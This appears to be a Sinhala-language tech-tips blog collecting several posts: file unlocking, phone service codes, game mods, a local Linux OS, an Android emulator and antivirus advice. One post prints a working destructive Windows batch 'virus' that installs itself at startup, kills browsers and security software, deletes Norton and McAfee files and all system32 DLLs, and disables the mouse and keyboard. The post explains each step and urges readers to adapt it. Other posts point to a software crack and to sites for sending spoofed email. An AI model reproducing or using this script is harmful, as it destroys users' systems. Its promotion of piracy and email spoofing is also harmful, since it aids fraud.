Email


File delete කරන කොට එන මල වදයක් තමයි the action can't be completed because the file is open in ... ඔන්න ඔහොම කියාගෙන error මැසේජ් එකක් එන එක.. ඉතින් අපිට ඒ file එක  කොච්චර delete කරන්න ඕනි උනත් delete කරගන්න බැරි වෙනවා..


මේ පරිප්පුව මටත් කන්න වුන නිසා මම මේකට කරන්න පුලුවන් මොනවද කියල හොය හොය ඉන්නකොට වැඩේට හරියන නියම soft එකක් හම්බුනා. සුපිරියටම වැඩ කරනවා.. ඒ වෙලාවේ ඕනි file එක delete කරන්න බැරිනම් ඊළග restart එකේදි හරි file එක delete කරනවා..

ඔය දාලා තියෙන්නෙ ඒකෙ screenshot එකක්.. file එකක් delete කරන්න ඕනිනම් කරන්න තියෙන්නෙ ඕනි file එක right click කරල unlocker  කියන එක තෝරන එක විතරයි.



එහෙනම් පහල තියෙන link එකෙන් download කරගෙන වැඩේ කරල බලන්න..... අපි ගියා.. :D







මේ codes පාවිච්ච් කරනකොට ටිකක් ප්‍රවේශමින් ඒ වැඩේ කරන්න.ඒකට හේතුව තමයි ඔයාට codes වලින් සිද්ධවෙන දේ ගැන වැඩි අවබෝධයක් නැතුව ඒ codes වලින් phone එකට ගැලපෙන්නෙ නැති විධාන ලබාදුන්නොත් phone එක වැඩකරන්නෙ නැතුව යන්න ඉඩතියෙනවා.....



 default user code: 1122, 3344, 1234, 5678

Engineer mode: *#110*01#

Factory mode: *#987#

Enable COM port: *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200

Restore factory settings: *#987*99#

LCD contrast: *#369#

Software version: *#800#

Software version: *#900#

Set default language: *#0000# Send

set English language: *#0044# Send

set English language (new firmware): *#001# Send

Batch programming වලට ආස සෙට් එකට තමා මේක. ටිකක් පරණ පොතක් ඒ වුනාට ඉතින් අවුලක් නෑ :D. මම කලින් දැම්ම notepad tricks වගේ ඒවා හදන්නෙත් මෙහෙම තමා.... පොතනං ඉතින් මම ලියපු එකක් නෙමෙයිලු ඈ... ලියල තියෙන්නෙ Premkumar කියලා කෙනෙක්... පොඩි අස්පට් එකකට තියෙන්නෙ තියෙන්නෙ English වලින්...මමත් ඉතිං දුක තමා කියල  madhura dic එක පැත්තකින් තියාගෙන තමා පොත කියෙව්වෙ... හැබැයි ඉතිං වැඩි අවුලකුත් නෑ ඕනි පොඩි එකෙක්ට තේරෙන්න ලියලා තියෙනවා...

Download      (3 MB) 

ප.ලි. මේ වගේ තව ebook තියෙනවනම් තනියම බලන්නැතුව මටත් දෙන්න හොදේ.... link එකේ අවුලක් ඇවිත් තිබුනා ඔන්න ආයෙ දැම්මා........

කාලෙකින් තමා sanandreas ගැන post එකක් දැම්මෙ. මේවා දන්න අයත් ඇති නොදන්න අය වෙනුවෙන් තමා මේ tricks ටික දාන්නෙ.මේවා වැඩකරන්න නම් cleo කියන පොඩි plugin එකක් තියෙනව game එකට install කරන්න...


මේවා install කරන හැටි ඇතුලෙ තියෙන readme එකේ ඇති...

1.Cheat menu


2. Speedometer & Gasoline

3. Personalized FPD

4. GTA SA SIMS real
5.  Zeti's Advanced Car Control v2
6.  Design Your Own Mission V5

7. Tornado mod

8. Repaired Car Wash
9. Ubuntu දාන් ඉන්න කස්ටියට  San Andreas for UBUNTU

10. New Great Effects 1.4

මේ දාල තියෙන්නෙ මම install කරල බලල වැඩකරපු mods විතරයි...තව ගොඩක් mods තියෙනවා ඕනිනම් මම මේ post එකේ දාල තියෙන links වලින් ගිහින් ගන්න.....
 ප.ලි. දානෙ ගෙදරකට උදවු වෙන්න ගිහින් දැන් තමා ආවෙ. (ගිහිනුත් කලේ අයිස් ගහපු එක ඒක මෙතනට අදාල නෑ :D)ආව ගමන් ඉතින් post එකක් කෙටුවා.මාර නිදිමතේ මේක කෙටුවෙ අකුරුත් වැරදිද දන්නෑ...


බුකිය පැත්තෙ රවුමක් ගහනකොට ටිකක් අමුතු pic එකක් දැක්කා.මුලින් හිතුවෙ ඡන්ද පෝස්ටරයක් කියල. පහල කවුද මන්ද ඉන්නවනෙ ඡන්ද පෝසටර්වල ඉන්න කස්ටිය වගේ.

දැකපු අමුතු මෙව්වා එක

zoom කරල බැලුවාම තමා seen එක දැක්කෙ. ලංකාවෙ සෙට් එකක් හදපු os එකක්. ලංකාවෙන් හදපු Hanthana Linux වගේ තව os තියෙනව තමා. ඒ වුනාට ඉතින් මේකෙ ඊට වඩා පොඩි පෙනුමක් තියෙනවා වගේම ඊට වඩා speed එකත් හොදයි. ( මේ කියන්නෙ Hanthana Linux නරකයි කියල එහෙම නෙමෙයි ඈ... ඒකත් මේක වගේම ගොඩක් හොද os එකක් :D) පහල තියෙනවා interface එකේ මෙව්වා ටිකක්..








මේකෙ තියෙන තවත් විශේෂත්වයක් තමයි os එකත් එක්ක එන සමහර software හදල තියෙන්නෙ ලංකාවෙම කස්ටිය. හොද download manager එකකුත් තියෙනවා GetJET කියල.





Minimum System Requirements
Processor                 : 1.7 GHz
R. A. Memory          : 1GB
V.G.A. Memory       : Doesn't matter how much you got, but will be awesome if it supports 3D acceleration

ඉතින් අනේ මන්ද ‍තව මොනව කියන්න්නද කියල ලිව්වා වැඩියි වගේ....seen එක දැක්ක ගමන් මාර සතුටක් ආවෙ යකෝ ලන්කාවෙ දෙයක් නේද කියලා.අලුත් දෙයක් කරනකොට කන්න ඕනි කට්ට අමුතුවෙන් කියන්න ඕනි නෑ හැදුවටත් වඩා කට්ටක් කන්න වෙනව වැඩේ මිනිස්සු අතරට අරන් යන්න.ඒක මම අත්දැකීමෙන්ම දන්නවා.සුපිරිම කට්ටක් කන්න වගේම කාලයත් ගොඩක් කැපකරන්න වෙනව මේ වගේ දෙයක් කරනකොට. මේක හැදුව set එකට ඇත්තටම ස්තූති කරන්න ඕනි මෙහෙම දෙයක් කෙරුවට.

Download කරගන්න එකත් මම එයාලගෙ site එ‍කෙන්ම download කරගන්න විදියට දැම්මෙ. Download කරන්න data නැති එව්වො උනත් කමක් නෑ අඩුගානෙ ඒ site එකට ගිහින් comment එකක් දාපල්ලා මචන්ලා උන්ට ඒක ගොඩක් වටිනවා..

OS එක බාන සෙට් එක මෙතන කොටලා බාගන්න

Comment දාන set එකට

.ලි. වර්ණනාව වැඩි වුනාවැඩිද මන්ද ඔන්න ේ publish කලා class යන්නත් පරක්කු වෙනවා.. එහෙනම් ඉතින් අපි කැපුනා.....


Android phone තියෙන කස්ටියටනම් ඉතින්  apps run කරන එක අවුලක් නෙමෙයිනෙ. අපිනම් ඉතින් තාම java. ඒක නිසා ඉතින් android apps computer එකේවත් run කරන්න පුලුවන් soft එකක් තියෙනවද කියල හොයනකොට තමා මේක අහුවුනේ. apps නෙමෙයි කෙලින්ම android os එකම pc එකේ run කරන්න පුලුවන්...



පොඩි අවුලකට තියෙන්නෙ මේක සල්ලි දීලා ගන්න ඕනි soft එකක්.. කහනව කහනව වගේනම් ඉතින් සල්ලි දීල ගත්තත් කමක් නෑ. නැත්තං ඉතින් පහල දාල තියෙන crack එක download කරගන්න..:D

crack එක හම්බුනේ 2.3.4 version එකට විතරයි. 4.0.2 version එකට හම්බුන crack හැම එකේම වගේ virus තිබුනා.









තව soft එකක් හම්බුනා BlueStacks කියල. ඒක නම් කොහොමද දන්නෑ මගේ දුප්පත් කොමේ ඒක run කරන්න බෑ.... :(

System Requirements:

    1 GHz or faster processor
    2 GB RAM.
    Minimum 800 MB free hard disk space.


 එහෙනං ඉතිං අපි කැපුන.... අදහසක් දාගෙනම යන්න හොදේ....................
 



මේ දවස් ටිකේ දැම්ම හැම ලිපියෙම අගට tricks කෑල්ලක් වැටුන නිසා මේකටවත් එහෙම නැතුව වෙන නමක් දාන්න විනාඩි 20ක් විතර කල්පනා කලා ඒ උනාට නමක් මතක් උනේම නෑ...ඒකනිසා ඉතින් මේකටත් tricks කියලා දාන්නම උනා..ඒක ඉතින් වැඩිය ගන්න ගන්න එපා හොදේ....

internet එකේ එක එක පිස්සු වැඩ කරනකොට මට හම්බවෙච්ච email සම්බන්ද site ටිකක් ගැන තමා මම දැන් කියන්න යන්නෙ...

1. Privnote

 අපි යවන පණිවිේ ලබන්නා බැලුවට පස්සෙ auto delete වෙන විදිහට යවන්න ොදම විදියක් තමයි ේ site එක. 

කරන්න තියෙන්නෙ මුලින්ම ේ site එකට ගිහින් Write your note below කියන තැන ඔයාගෙ පණිවිේ ගහල create note කියන button එක ඔබන එක. එතොට ොල්ඔයාට link එකක් දෙනවා. කරන්න තියෙන්නෙ ඒ link එක පණිවිේ යවන්න ඕනි කෙනාට යවන එක. එයා ඒ පණිවිේ බලලා ටික වෙලාවකින් ඒක ඉේම delete වෙලා යනවා.....

2. Send Anonymous Email


නමින්ම තේරෙන්න ඇතිනෙ seen එක. මේකෙන් පුලුවන් වෙන කවුරුහරි යවන විදියට email යවන්න. ඕක ඉතින් ගොඩක් ප්‍රයෝජනේට ගන්න පුලුවන් දෙයක්නෙ... :D හැබැයි ඉතින් පොඩි අවුලකට තියෙන්නෙ email එක යවපු කෙනාට යන්න පැයක් දෙකක් විතර යන එක තමයි. 


 සමහර වෙලාවල් වලට අපිට තාවකාලික Email හදාගන්න ඕනි වෙනවනෙ. ඉතින් ඒ වගේ වෙලාවට පාවිච්චියට ගන්න තමා මේ service එක තියෙන්නෙ. ඒ වගේ තාවකාලික Email එකක් ඕනි වෙලාවට කරන්න තියෙන්නෙ site එකට ගිහින් එයාලා දෙන email එක ගන්න විතරයි..


4. Spypig



 තමන් යවපු Email එක යවපු කෙනා කියෙව්වද කියල ොයාගන්න නිනම් ේ site එක තමා ඒ වැේට හරියන්නෙ..

5. Send-Email 

 Email එක එව්වෙ කවුද කියලා ොයාගන්න බැරිවෙන්න email යවන්න ඕනිනම් ේ site එකෙන් ඒ වැේ කරගන්න පුලුවන්..

6. Emkei





Fake email යවන්න ඕනිනම් ඉතින් මීට වඩා ොද සයිට් එකක් නෑ.... 


අපි Facebook page එකක් හැදුවාම මාර ගේමක්නෙ දෙන්නෙ like ගාන වැඩිකරගන්න..Web site එකක් හැදුවත් ඉතින් මාර කට්ටක් කනවනෙ web traffic එක වැඩිකරගන්න. ඕකට ක්‍රමයක් තියෙනවද කියල හොයනකොට තමයි මට මේ site එක හම්බුනේ. ඕවා වැඩිය විශ්වාස කරන්න බැරි නිසා මම මුලදි try එකක් දාලා බැලුවා. නියමෙටම වැඩ.You tube like වගේ තව ගොඩක් දේවලුත් මේකෙන් ගන්න පුලුවන්...

මේකෙදි කරන්න තියෙන්නෙ අනුන්ගෙ post වලට like කරන එක,අනුන්ගෙ post share කරන එක වගේ දේවල්. එතකොට අපිට point හම්බවෙනවා.register උන ගමන් point 100ක් හම්බවෙනවා... point ගාන වැඩිවෙන්න වැඩිවෙන්න අපිට ඕනි like, traffic එක ඉබේම වැඩිවෙනවා..

සයිට් එකට ගිහින් register වෙලා add site/page කියන එකට ගිහින් link එක වගේ විස්තර දීලා වැඩේ පටන් ගන්න.....


 සයිට් එකට මෙතනින් යන්න

 අදහසක් දාන්න ේ..............


Notepad tricks කියලා මම දාපු ලිපිය ගොඩක් දෙනා බලල තිබුනා.. ඉතින් මට හිතුනා virus එකක් හදන හැටි කියලා දුන්නනම් හොදයි කියලා...හැබැයි ඉතින් මේවා ඕනි නැති වැඩවලට පාවිච්චි කරන්න එපා හදන්නෙ කොහොමද කියලා විතරක් දැනගන්න....:D

මේකත් හදන්න තියෙන්නෙ notepad එකෙන්ම තමයි...වෙනස තියෙන්නෙ start up එකේදිත් වැඩකරනවා විතරක් නෙමෙයි explorer.exe, chrome.exe and firefox.exe වගේ process එහෙමත් run වෙන්න නොදී kill කරනවා.....හැබැයි ඉතින් වැඩේ සාර්ථක xp වල විතරයි.මොකද කියලනම් අහන්න එපා මමත් seen එක දන්නෑ..:D


මුලින්ම පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all කරලා virus.bat කියලා දීලා save කරන්න. (virus.bat වගේ) .exe එකක් හදාගත්තත් කමක් නෑ.
@echo off
copy "virus.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy "virus.bat" "C:\"
copy "virus.bat" "%userprofile%\My Documents"
tskill explorer
tskill ccapp
tskill yahoomessenger
tskill firefox
tskill chrome
rem made with Batch Virus Maker V.2
tskill iexplorer
time 12:00
rem made with Batch Virus Maker V.2
del C:\Program Files\Common Files\Symantec Shared\ccapp.exe
cd C:\WINDOWS
if exist "*.bat" del "*.bat"
cd C:\WINDOWS\system32
rem made with Batch Virus Maker V.2
if exist "*.dll" del "*.dll"
tskill McAfee Security Centre Module
del c:\program files\mcafee.com\agent\mcdetect.exe
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45544"
copy "virus.bat" "virus.bat85858"
copy "virus.bat" "virus.bat1645"
copy "virus.bat" "virus.bat574457"
copy "virus.bat" "virus.bat55457"
copy "virus.bat" "virus.bat9765"
copy "virus.bat" "virus.bat45465"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat456877"
copy "virus.bat" "virus.bat77989845"
copy "virus.bat" "virus.bat2135"
copy "virus.bat" "virus.bat46876"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45687"
copy "virus.bat" "virus.bat8868"
copy "virus.bat" "virus.bat2000"
copy "virus.bat" "virus.bat2009"
msg * this is a virus

 දැන් මම කියල දෙන්නම් ඔය උඩ තියෙන codes වලින් මොකද වෙන්නෙ කියලා..

       1. මේ කොටසෙන් කරන්නෙ virus.bat කියන අපි හදාගත්තු file එක startup එකට , C: එකට, my documents folder එකට copy වෙන එක.

@echo off
copy "virus.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy "virus.bat" "C:\"
copy "virus.bat" "%userprofile%\My Documents"

       2. මේ කොටසෙන් වෙන්නෙ Internet Explorer, yahoo messenger එක වගේ files වල task kill කරන එක,වෙලාව 12:00 ට වෙනස් කරන එක,  install කරල තියෙන්නෙ norton antivirus එකනම් ඒකෙ අත්‍යාවශ්‍ය files delete කරන එක වගේ දේවල්.

tskill explorer
tskill ccapp
tskill yahoomessenger
tskill firefox
tskill chrome
rem made with Batch Virus Maker V.2
tskill iexplorer
time 12:00
rem made with Batch Virus Maker V.2
del C:\Program Files\Common Files\Symantec Shared\ccapp.exe

     3. මේ කොටසෙදි වෙන දේ තමයි windows/system32 වල තියෙන dll file ඩිලීට් වෙන එක..මේක computer එකට කොච්චර බලපානවද කියල ඉතින් කියන්න ඕනි නැහැනෙ. install කරල තියෙන්නෙ macafee antivirus එකනම් ඒකෙ අත්‍යාවශ්‍ය files delete කරන එකත් තියෙන්නෙ මේ ටිකේම තමයි. virus එක copy වීමත් මේ ටිකේදි සිද්ධවෙනවා...

cd C:\WINDOWS
if exist "*.bat" del "*.bat"
cd C:\WINDOWS\system32
rem made with Batch Virus Maker V.2
if exist "*.dll" del "*.dll"
tskill McAfee Security Centre Module
del c:\program files\mcafee.com\agent\mcdetect.exe
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45544"
copy "virus.bat" "virus.bat85858"
copy "virus.bat" "virus.bat1645"
copy "virus.bat" "virus.bat574457"
copy "virus.bat" "virus.bat55457"
copy "virus.bat" "virus.bat9765"
copy "virus.bat" "virus.bat45465"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat456877"
copy "virus.bat" "virus.bat77989845"
copy "virus.bat" "virus.bat2135"
copy "virus.bat" "virus.bat46876"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45687"
copy "virus.bat" "virus.bat8868"
copy "virus.bat" "virus.bat2000"
copy "virus.bat" "virus.bat2009"
msg * Techtrickslanka

    4. Mouse එකයි keyboard එකයි disable වෙන එකයි තමයි මේ කොටසින් වෙන්නෙ.

rundll mouse,disable
rem made with Batch Virus Maker V.2
rundll keyboard,disable


     ඉතින් code ටික බලපු dos command ගැන ටිකක් හරි දන්න අයට තේරෙන්න ඇති මේකෙ ගොඩක් use කරල තියෙන්නෙ dos commands කියල (කොහොමත් එහෙම වෙන්න ඕනිනෙ මේක dos application එකක්නෙ :D) ඉතින් පේනවා ඇතිනෙ dos commands ටිකක් හරි දන්නවනම් වැඩේ ගොඩ කියලා.

මේක ටිකක් වෙනස් කරල හදල බලන්න. මම දීපු code එක run නොකර පුලුවන් නම් පොඩි code එකක් හදාගෙන run කරන්න try එකක් දෙන්න.

උදාහරණයක් විදියට පහල තියෙන code එක බලන්න.ඔය code එක වැඩනම් තව ටිකක් එකතු කරල තව ටිකක් හොදට හදාගෙන අන්තිමට හොද code එකක් හදාගන්න බලන්න.
@echo off
copy "virus.bat" "D:\" 

මම දීලා තිබුන notepad tricks වලටත් මේ කෑල්ලක් දෙකක් දාල බලන්න සමහර විට වැඩකරයි.





එහෙනම් ඉතින් post එක ඉවරයි යන ගමන් අදහසක් දාගෙන යන්න..............................



දැන් antivirus software පුරාම තියෙන නිසා මට හිතුනා හොද antivirus software එකක් තෝරගන්නෙ කොහොමද කියලා කිව්වනම් හොදයි කියලා..

antivirus software එකක මෙන්න මේ හැකියාවන් තියෙනවනම් ඒක හොද antivirus software එකක් කියල සලකන්න පුලුවන්.

  • දැනට හදුනාගෙන තියෙන සියලුම virus ඉවත් කරන්න වගේම අලුත් වයිරස් ඒවායේ හැසිරීමෙන්ම නිවැරදිව වයිරස් එකක් කියලා අදුරගන්න පුලුවන් වෙන්න ඕනි.
  • වයිරස් විතරක් නෙමෙයි worms, spyware, adware, torjan horse, rootkit වගේ හානිකර වැඩසටහන් අදුරගෙන ඒවා ඉවත් කරන්න හැකියාව තියෙන්නත් ඕනි.
  • ක්‍රියාත්මක වෙන හැම file එකක්ම ආරම්භයේදිම වයිරස් හදුනාගැනීමේ පරීක්ෂාවකට ලක් කරන්න (Real time protection) පුලුවන් වෙන එක අනිවාර්යෙන්ම තිබිය යුතුම හැකියාවක්.
  •  දිනපතාම updates නිකුත් කරන software එකක් වෙන්නත් ඕනි වගේම තමයි ඒ updates automatically download කරගන්නත් හැකියාව තියෙන්න ඕනි.
  • Antivirus software එකක් install කළාම තියෙන ප්‍රධානම කරදරේ තමයි computer එක slow වෙන එක. මේ හේතුව නිසාම සමහරු Antivirus software පාවිච්ච් කරන එකත් නවත්තනවා.ඉතින් ඒක නිසා computer එකේ Memory, HDD, processor එක වගේ දේවල් අඩුවෙන් පාවිච්චි කරන software එකක් වෙන්නත් ඕනි.
  • userගේ මැදිහත්වීම අවම විදියට යොදාගෙන ස්වයංක්‍රීයව වැඩකරන්න වගේම ඕනි කෙනෙක්ට පහසුවෙන් තේරුම් ගන්න පුලුවන් interface එකකුත් තියෙනවනම් ගොඩක් හොදයි.
  • වැඩියෙන්ම virus එන්නෙ CD/ Pen drives වගේ දේවල් වලින්නේ.ඉතින් හොද  Antivirus software එකකට මේ වගේ removable devices computer එකට connect කරපු ගමන් scan කිරීමේ හැකියාවත් තියෙන්න ඕනි.
  •  වයිරස් අඩංගුවන websites , e-mail වගේ දේවල් කල්තියා අදුරගෙන ඒවා computer එකට පැතිරීම නවත්තලා ඒක ගැන user ට අනතුරු අගවන්න පුලුවන්කම තියෙන එකත් අනිවාර්යයි.
ඒ වගේම තමයි බොරු antivirus softwareත් දැන් එන්න එන්නම වැඩි වෙනවා. මේවාගෙන් කරන්නෙ computer එකේ virus නැතත් virus තියෙනවා කියලා පෙන්නලා සල්ලි දීලා product එක active කරන්න එතකොට virus remove වෙනවා වගේ බොරු දේවල් කරන එක තමා මේ fake antivirus software වලින් කරන්නේ. පහල තියෙන්නෙ ඒ වගේ fake antivirus software දෙකක්.



 ______________________________________________________________

පහලින් මම දාලා තියෙන්නෙ දැනට තියෙන හොදම  antivirus software 10 ක්. මේවාගෙන් සමහර software නිකන් දෙනවා. අනිත් ඒවානම් ඉතින් සල්ලි දීලා ගන්න තමා වෙන්නේ.......

1. Bit defender Antivirus Plus


 2. Kaspersky Anti-Virus


 3. Norton AntiVirus















7. AVG Anti-Virus




8. Avast! Pro Antivirus




9. Trend Micro Titanium Antivirus +




10. VIPRE Antivirus


ගොඩක් වෙලා ගියා type කරන්න....එහෙනම් යන ගමන් අදහසකුත් දාගෙනම යන්න......................:D

තවත් එකක් නොව සියල්ලටම එකක්.....